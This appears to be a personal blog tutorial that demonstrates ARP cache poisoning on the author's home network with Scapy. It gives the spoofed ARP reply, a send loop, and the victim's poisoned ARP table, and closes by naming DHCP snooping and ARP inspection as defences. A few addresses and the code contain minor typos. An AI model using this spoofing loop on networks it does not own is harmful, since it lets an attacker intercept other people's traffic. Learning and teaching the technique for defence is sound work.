Perform an Arp Poisoning Attack Using Scapy

by: George El., November 2019, Reading time: 3 minutes

In this post I will show you how to perform an arp poisoning attack on local network using a python package called scapy. Scapy is a package that allows us to craft our own packets specifying all layers from layer2 to layer7.

In my local network I have two pcs, with addresses 192.168.1.73 and 192.168.1.78, respectively. The adsl router has ip 192.168.1.254 and is the gw of the two pcs.

My goal is to arp poison pc 192.168.1.78 so that it sends its packet to pc 192.168.1.73 instead of gw 192.168.1.154

Lets see the arp table of 192.168.1.78

arp -a

Interface: 192.168.1.78 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.73          fc-aa-14-01-cd-41     dynamic
  192.168.1.254         00-1f-9f-ce-d3-94     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static

Now I will create an arp reply packet and send it from 192.168.73 to 192.168.1.78. If you don’t have scapy installed, do a pip install scapy, and run scapy. You will get a >>> prompt. there you can write python code

(base) D:\NetEng>pip install scapy
Requirement already satisfied: scapy in d:\anaconda3\lib\site-packages (2.4.3)

(base) D:\NetEng>scapy
                                      
                     aSPY//YASa       
             apyyyyCY//////////YCa       |
            sY//////YSpcs  scpCY//Pp     | Welcome to Scapy
 ayp ayyyyyyySCP//Pp           syY//C    | Version 2.4.3
 AYAsAYYYYYYYY///Ps              cY//S   |
         pCCCCY//p          cSSps y//Y   | https://github.com/secdev/scapy
         SPPPP///a          pP///AC//Y   |
              A//A            cyP////C   | Have fun!
              p///Ac            sC///a   |
              P////YCpc           A//A   | Wanna support scapy? Rate it on
       scccccp///pSP///p          p//Y   | sectools!
      sY/////////y  caa           S//P   | http://sectools.org/tool/scapy/
       cayCyayP//Ya              pY/Ya   |             -- Satoshi Nakamoto
        sY/PsY////YCc          aC//Yp    |
         sc  sccaCY//PCypaapyCP//YSs  
                  spCPY//////YPSps    
                       ccaacs         
                                       using IPython 6.5.0
>>> 

then you can write python code

>>>arpspoofed = ARP(op=2, psrc="192.168.1.254", pdst="192.168.1.78"
                        hwdst="FC:AA:14:01:CD:41")

>>> arpspoofed.show()
###[ ARP ]###
  hwtype= 0x1
  ptype= IPv4
  hwlen= None
  plen= None
  op= is-at
  hwsrc= fc:aa:14:01:cd:41
  psrc= 192.168.1.254
  hwdst= FC:AA:14:01:CD:41
  pdst= 192.168.1.78

>>> while(True):
...:    send(arpspoofed)

Lets check the arp table of 192.168.1.78 again

(base) C:\Users\User>arp -a

Interface: 192.168.1.78 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.73          fc-aa-14-01-cd-41     dynamic
  192.168.1.254         fc-aa-14-01-cd-41     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static

You see now that the target pc believes that 192.168.1.254 has hw address the address of 192.168.1.73. From now on it will send all packets destined to 192.168.1.254 to 192.168.1.73

So you can see that performing an arp poisoning or Man in the Middle attack is very easy. Of course there are ready made tools than can automate all this stuff for you, but I wanted to show you how to do it yourself.

In order to avoid this kind of attacks you have to apply dhcp snooping and arp inspection on your local Network. Please check my post on how to do this. Configuring dhcp snooping and arp inspection

comments powered by Disqus